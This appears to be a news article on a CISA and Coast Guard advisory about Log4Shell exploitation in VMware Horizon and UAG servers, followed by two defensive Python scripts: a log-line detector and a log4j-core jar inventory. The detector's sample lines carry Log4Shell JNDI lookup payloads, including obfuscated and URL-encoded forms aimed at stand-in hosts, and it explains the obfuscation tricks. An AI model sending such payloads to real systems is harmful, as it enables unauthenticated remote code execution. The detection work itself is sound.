The United States Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) have issued a joint advisory to warn organizations that threat actors continue to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers.
Tracked as CVE-2021-44228, the Log4Shell vulnerability was reported to Apache in late November 2021 and publicly disclosed in December 2021. It affects the widely used Apache Log4j 2 logging library and is a critical-severity (CVSS 10.0) flaw that allows unauthenticated remote code execution.
Exploitation was observed less than two weeks after the bug was reported, and mass scanning followed within hours of public disclosure, prompting organizations to prioritize deployment of the available patches.
Since December 2021, numerous threat actors, including state-sponsored advanced persistent threat (APT) groups, have been observed exploiting the vulnerability in VMware Horizon and UAG servers. VMware published fixes and interim workarounds for the affected products in December 2021.
Following successful exploitation, the adversaries deploy loader malware and ultimately gain remote control of the compromised systems. In one incident, CISA and CGCYBER say, the threat actors moved laterally into the victim's disaster recovery network and exfiltrated sensitive data.
The joint Cybersecurity Advisory (CSA) from CISA and CGCYBER provides details on the tactics, techniques, and procedures (TTPs) employed by threat actors in the observed attacks, along with incident response recommendations.
Attackers exploit Log4Shell by sending a request that contains a JNDI lookup string, for example in an HTTP header or URL parameter that the target writes to its logs. Vulnerable Log4j versions resolve the lookup when the value is logged, fetching and executing attacker-supplied code, so the result is arbitrary code execution without authentication. Because Log4j is embedded in so many consumer and enterprise applications, services, websites, and appliances, any product that logs attacker-controlled input through a vulnerable version is exposed.
During one of the observed attacks, the threat actors deployed a remote access tool that could log keystrokes, deploy and run additional payloads, and give the attackers access to the compromised system's desktop. The malware also functioned as a command and control (C&C) tunneling proxy, allowing the attackers to move laterally within the network.
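As an added illustration of what those crafted requests look like on the wire and how a defender can hunt for them, here is a small Python detector run over constructed web-server access-log lines. This is example code written for this page, not tooling from CISA, CGCYBER or VMware, and the log lines, IP addresses and URLs in it are made up. It URL-decodes each line, collapses the nested lookup tricks (${lower:j}, ${::-j}, ${env:X:-j}) that scanners use to hide the ${jndi: prefix from naive string matching, and reports the JNDI lookup that remains.

```python
import re
import urllib.parse

# Constructed web-server access-log lines for the demo (not taken from the advisory).
# Line 1 is benign; lines 2-4 carry a JNDI lookup in the User-Agent or query string,
# the third obfuscated with nested lookups and the fourth URL-encoded.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.9 - - [23/Jun/2022:10:02:30 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.9/x}"',
    '198.51.100.9 - - [23/Jun/2022:10:02:31 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fy%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
]

_INNER = re.compile(r"\$\{([^${}]*)\}")          # innermost ${...} with no nested lookup inside
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_PASSES = 10                                   # bound the rewrite loop on hostile input


def _resolve(m):
    """Rewrite one innermost lookup roughly the way Log4j's substitutor would."""
    expr = m.group(1)
    name, sep, value = expr.partition(":")
    if name.strip().lower() == "jndi":
        return m.group(0)                 # keep the JNDI lookup itself; that is the indicator
    if ":-" in expr:                      # ${x:-default} -> default; covers ${::-j} and ${env:X:-j}
        return expr.split(":-", 1)[1]
    if name.lower() == "lower":           # ${lower:J} -> j
        return value.lower()
    if name.lower() == "upper":           # ${upper:j} -> J
        return value.upper()
    return value if sep else expr         # any other lookup: keep its argument text for matching


def normalize(text):
    """URL-decode and collapse nested lookups until only ${jndi:...} (if any) is left."""
    text = urllib.parse.unquote(text)
    for _ in range(MAX_PASSES):
        rewritten = _INNER.sub(_resolve, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def find_jndi(line):
    """Return the normalized JNDI lookup found in the line, or None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    return norm[m.start():end + 1] if end != -1 else norm[m.start():]


def scan(lines):
    """Return (line_number, indicator) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        indicator = find_jndi(line)
        if indicator:
            hits.append((number, indicator))
    return hits


if __name__ == "__main__":
    for number, indicator in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {indicator}")
```

Run scan() over the access logs of the Horizon and UAG web tier, and over any application log that records request headers. The normalization deliberately handles only the lookup forms shown, so an empty result is not proof of absence; every hit is worth correlating with outbound LDAP or RMI connections from the server around the same timestamp.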
While investigating the compromise of another victim, CISA discovered intrusions from multiple threat actors, some of which had access to the environment since late January 2022 or earlier. The attackers likely exploited Log4Shell in an unpatched VMware Horizon server for initial access.
Following initial access, the threat actors used PowerShell scripts to deploy additional payloads and moved laterally over the Remote Desktop Protocol (RDP), compromising multiple systems, including the victim's disaster recovery network. On those systems they deployed malware that gave them monitoring, reverse shell, payload delivery, and data exfiltration capabilities.
If a potential compromise is identified, CISA and CGCYBER say, administrators should immediately isolate the affected systems, collect and review the relevant logs, data, and artifacts, engage a third-party incident response firm if needed, and report the incident to CISA or the US Coast Guard (USCG) National Response Center (NRC).
To mitigate the risk, organizations are advised to bring their VMware Horizon and UAG systems up to versions patched against Log4Shell, and to treat any system that has not been patched as already compromised. Keeping all software up to date, segmenting the network, enforcing multi-factor authentication, and following identity and access management (IAM) best practices further reduce the risk.
“Until the [VMware] update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible,” the CSA reads.
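As an added, generic check to support the "patch, and treat unpatched systems as compromised" guidance above, the following Python script inventories log4j-core jars under a directory and classifies each by version and by whether the JndiLookup class (the component the interim Log4Shell workarounds removed) is still present. It is example code written for this page, not VMware's or CISA's scanner: it knows nothing about Horizon's or UAG's install paths, does not open jars nested inside other jars or WAR files, and its demo() function builds constructed stand-in jars in a temporary directory so it runs offline.

```python
import os
import re
import tempfile
import zipfile

# Entry names inside a real log4j-core jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# CVE-2021-44228 affects Log4j 2 before 2.15.0; the Java 7 and Java 6
# backport releases below carry the same fix despite the lower number.
FIXED_BACKPORTS = {(2, 12, 2), (2, 12, 3), (2, 12, 4), (2, 3, 1), (2, 3, 2)}


def parse_version(text):
    """Extract a (major, minor, patch) tuple from a version string or jar file name."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_vulnerable_version(version):
    """True when the version falls in the CVE-2021-44228 range."""
    return version is not None and version < (2, 15, 0) and version not in FIXED_BACKPORTS


def jar_version(zf, path):
    """Prefer the Maven pom.properties shipped inside the jar; fall back to the file name."""
    if POM_PROPS in zf.namelist():
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return parse_version(line.split("=", 1)[1])
    return parse_version(os.path.basename(path))


def assess_jar(path):
    """Describe one log4j-core jar: version, JndiLookup presence, and exposure."""
    with zipfile.ZipFile(path) as zf:
        version = jar_version(zf, path)
        has_jndi = JNDI_CLASS in zf.namelist()
    needs_update = is_vulnerable_version(version)
    return {
        "path": path,
        "version": version,
        "jndi_lookup_present": has_jndi,
        # Vulnerable version with the class present: exploitable as it stands.
        # Vulnerable version with the class removed: the interim workaround is in
        # place, but the real update is still due.
        "exploitable": needs_update and has_jndi,
        "needs_update": needs_update,
    }


def scan_tree(root):
    """Walk root and assess every log4j-core*.jar found (nested jars are not opened)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                try:
                    findings.append(assess_jar(path))
                except zipfile.BadZipFile:
                    findings.append({"path": path, "error": "not a valid jar"})
    return sorted(findings, key=lambda f: f["path"])


def make_test_jar(path, version, include_jndi):
    """Build a constructed stand-in jar (not a real Log4j build) for the demo."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Three constructed jars: exploitable, workaround applied, and fully patched."""
    with tempfile.TemporaryDirectory() as root:
        make_test_jar(os.path.join(root, "a", "log4j-core-2.14.1.jar"), "2.14.1", True)
        make_test_jar(os.path.join(root, "b", "log4j-core-2.14.1.jar"), "2.14.1", False)
        make_test_jar(os.path.join(root, "c", "log4j-core-2.17.1.jar"), "2.17.1", True)
        return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, call scan_tree() with the product's install root and act on any finding where needs_update is true, whether or not exploitable is also true: a jar with JndiLookup removed only tells you the workaround was applied, not that the vendor update the advisory calls for has been.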